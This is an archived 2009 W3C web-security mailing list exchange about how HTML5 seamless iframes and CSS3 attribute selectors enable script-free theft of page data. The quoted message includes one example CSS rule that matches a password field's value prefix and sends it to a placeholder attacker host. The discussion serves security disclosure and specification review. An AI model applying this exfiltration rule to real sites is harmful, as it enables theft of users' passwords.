- From: Adam Barth <w3c@adambarth.com>
- Date: Sat, 5 Dec 2009 08:54:58 -0800
- To: sird@rckc.at
- Cc: public-web-security@w3.org
I see. The issue is that the attacker can inject CSS + iframes, but not script, into one page in an origin. Now with seemless+CSS3, the attacker can steal information from the entire origin. Very cool! Adam On Fri, Dec 4, 2009 at 6:39 AM, Eduardo Vela <sirdarckcat@gmail.com> wrote: > I sincerely understand why people want seamless iframes on HTML5.. I mean, > I've been there.. but sometimes the better way to do something is not to do > it. > > The perfect example are seamless iframes (defined in html5) and CSS3 > selectors. > > I've showed (together with David Lindsay, and Gareth Heyes) expressed > several times that we think this is a bad idea. > > We always receive the same answer "seamless iframes are same-origin!" and > believe me, I know.. but guess what? javascript is also same origin.. and it > also creates problems. > > What I see with those awesome CSS3 selectors such as: > > input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")} > > create a new type of XSS attacks, and those are purely CSS based XSS > attacks.. without JS.. that will allow an attacker to read arbitrary files > from the page WITHOUT the need of JS. > > I really hope people in here know that a cool feature is sometimes not such > a good idea, and hopefully, we can see how to resolve this issue.. > > References: The Sexy Assassin - BlueHat 2008 Presentation http://p42.us/css/ > Favorite XSS - BlackHat 2009 Presentation http://p42.us/favxss/ > Stefano Di Paola PoC http://www.wisec.it/CssSteal/frame.html > > Greetings!! > -- Eduardo > http://www.sirdarckcat.net/ > >
Received on Saturday, 5 December 2009 16:56:05 UTC